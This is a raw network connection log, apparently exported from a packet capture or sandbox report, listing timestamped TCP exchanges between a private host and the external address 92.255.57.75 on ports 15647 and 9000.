Dec 17, 2024 08:39:49.861690998 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.861871958 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:49.909409046 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.909584999 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:49.989404917 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.989490032 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:50.029741049 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.029915094 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:50.032789946 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.112704039 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.115845919 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:50.152512074 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.152621031 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:50.181879997 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.183859110 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:50.224877119 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.225368977 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:50.272578955 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.272636890 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:50.345103979 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.347801924 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:50.417195082 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.417409897 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:50.496308088 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.496335030 CET	9000	49969	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.496356010 CET	9000	49969	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.496428013 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:50.496459007 CET	49969	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:50.496587038 CET	49969	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:50.611597061 CET	49975	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:50.616235018 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.616280079 CET	9000	49969	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.616461992 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:50.649909973 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.650883913 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:50.729612112 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.731426001 CET	9000	49975	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.731596947 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:50.731755018 CET	49975	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:50.731791973 CET	49975	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:50.770606041 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.770872116 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:50.841938019 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.842998981 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:50.851527929 CET	9000	49975	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.961723089 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:50.961772919 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:51.010360003 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:51.010441065 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:51.130152941 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:51.130301952 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:51.250344992 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:51.250494957 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:51.274003983 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:51.274163008 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:51.321803093 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:51.321969032 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:51.393879890 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:51.394010067 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:51.442889929 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:51.443068027 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:51.562885046 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:51.562956095 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:51.586195946 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:51.586258888 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:51.705996990 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:51.706072092 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:51.789489985 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:51.789585114 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:51.825891018 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:51.826013088 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:51.875022888 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:51.875102043 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:51.909420013 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:51.911817074 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:51.945759058 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:51.947861910 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:51.995049000 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:51.995778084 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.018346071 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.019849062 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.057125092 CET	9000	49975	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.057251930 CET	9000	49975	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.057374954 CET	49975	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.057529926 CET	49975	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.067576885 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.067796946 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.101805925 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.103827000 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.139522076 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.139832973 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.175009966 CET	49981	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.177248955 CET	9000	49975	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.187221050 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.187803030 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.223553896 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.223611116 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.294821024 CET	9000	49981	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.294919014 CET	49981	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.295089006 CET	49981	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.307579041 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.307643890 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.307868004 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.360666037 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.414812088 CET	9000	49981	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.415939093 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.418550968 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.505498886 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.507827044 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.538521051 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.539849997 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.619827986 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.619962931 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.627656937 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.659696102 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.659796000 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.730879068 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.731848001 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.739797115 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.741031885 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.779818058 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.779928923 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.820074081 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.820194006 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.860800982 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.863883018 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.932182074 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.932436943 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:52.989418030 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:52.989464045 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:53.044089079 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:53.044186115 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:53.109364033 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:53.109428883 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:53.181754112 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:53.181931973 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:53.301609993 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:53.301697969 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:53.417773962 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:53.417958975 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:53.537659883 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:53.537760019 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:53.613929987 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:53.614063025 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:53.620085001 CET	9000	49981	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:53.620214939 CET	9000	49981	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:53.620266914 CET	49981	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:53.620315075 CET	49981	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:53.729984999 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:53.730114937 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:53.737164974 CET	49982	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:53.739989042 CET	9000	49981	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:53.849694014 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:53.849813938 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:53.856797934 CET	9000	49982	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:53.856897116 CET	49982	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:53.857055902 CET	49982	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:53.922133923 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:53.922287941 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:53.976706982 CET	9000	49982	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:54.042047977 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:54.042146921 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:54.042186022 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:54.095088005 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:54.157725096 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:54.158181906 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:54.277992964 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:54.278121948 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:54.349669933 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:54.349821091 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:54.469542980 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:54.470199108 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:54.470490932 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:54.517173052 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:54.585836887 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:54.585964918 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:54.662031889 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:54.662369967 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:54.777822971 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:54.778251886 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:54.898304939 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:54.898463964 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:54.978971958 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:54.979295015 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:55.099193096 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:55.099347115 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:55.184206963 CET	9000	49982	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:55.184227943 CET	9000	49982	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:55.184360981 CET	49982	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:55.184503078 CET	49982	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:55.211287975 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:55.211422920 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:55.294385910 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:55.294486046 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:55.299362898 CET	49988	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:55.308324099 CET	9000	49982	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:55.402863979 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:55.402954102 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:55.420489073 CET	9000	49988	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:55.420564890 CET	49988	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:55.420690060 CET	49988	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:55.524971008 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:55.524983883 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:55.525120974 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:55.540446997 CET	9000	49988	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:55.607583046 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:55.607738018 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:55.717331886 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:55.717582941 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:55.838473082 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:55.838653088 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:55.960664034 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:55.960721016 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:56.031610012 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:56.031698942 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:56.152895927 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:56.153058052 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:56.265681982 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:56.265876055 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:56.345009089 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:56.345154047 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:56.464968920 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:56.465061903 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:56.467082977 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:56.516932964 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:56.577650070 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:56.577778101 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:56.697504997 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:56.746710062 CET	9000	49988	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:56.746781111 CET	9000	49988	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:56.746834040 CET	49988	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:56.769926071 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:56.813853025 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:56.829297066 CET	49988	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:56.837271929 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:56.890017986 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:56.890100956 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:56.939722061 CET	49994	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:56.949191093 CET	9000	49988	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:57.009655952 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:57.011996031 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:57.059689045 CET	9000	49994	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:57.059809923 CET	49994	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:57.059936047 CET	49994	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:57.082217932 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:57.082415104 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:57.179948092 CET	9000	49994	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:57.202370882 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:57.202430964 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:57.317727089 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:57.318068981 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:57.394790888 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:57.395869970 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:57.509946108 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:57.510054111 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:57.629781008 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:57.629894018 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:57.702183962 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:57.702279091 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:57.822211981 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:57.822329998 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:57.893268108 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:57.908169985 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:57.942125082 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:57.942282915 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:58.028162956 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:58.031855106 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:58.032342911 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:58.152189016 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:58.153872967 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:58.273690939 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:58.273873091 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:58.384850025 CET	9000	49994	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:58.385009050 CET	49994	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:58.386640072 CET	9000	49994	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:58.386691093 CET	49994	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:58.393645048 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:58.393744946 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:58.503139973 CET	49997	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:58.505393028 CET	9000	49994	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:58.513515949 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:58.513650894 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:58.622956991 CET	9000	49997	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:58.623214960 CET	49997	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:58.623289108 CET	49997	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:58.633446932 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:58.633605003 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:58.743045092 CET	9000	49997	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:58.753482103 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:58.753762960 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:58.873541117 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:58.873631954 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:58.993400097 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:58.993474960 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:59.113126993 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:59.113185883 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:59.232924938 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:59.233697891 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:59.233829021 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:59.397665977 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:59.397996902 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:59.518248081 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:59.518357038 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:59.638390064 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:59.638446093 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:59.758177042 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:59.758270025 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:59.869486094 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:59.869864941 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:59.878492117 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:59.878597021 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:59.950623035 CET	9000	49997	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:59.950743914 CET	9000	49997	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:59.950905085 CET	49997	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:59.951045990 CET	49997	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:59.991060019 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:59.991386890 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:59.998399973 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:00.061465979 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:00.061592102 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:00.065793037 CET	50002	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:00.070635080 CET	9000	49997	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:00.157367945 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:00.157450914 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:00.181310892 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:00.181536913 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:00.182867050 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:00.185483932 CET	9000	50002	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:00.185700893 CET	50002	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:00.185700893 CET	50002	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:00.237824917 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:00.297471046 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:00.298118114 CET	49995	15647	192.168.2.11	92.255.57.75
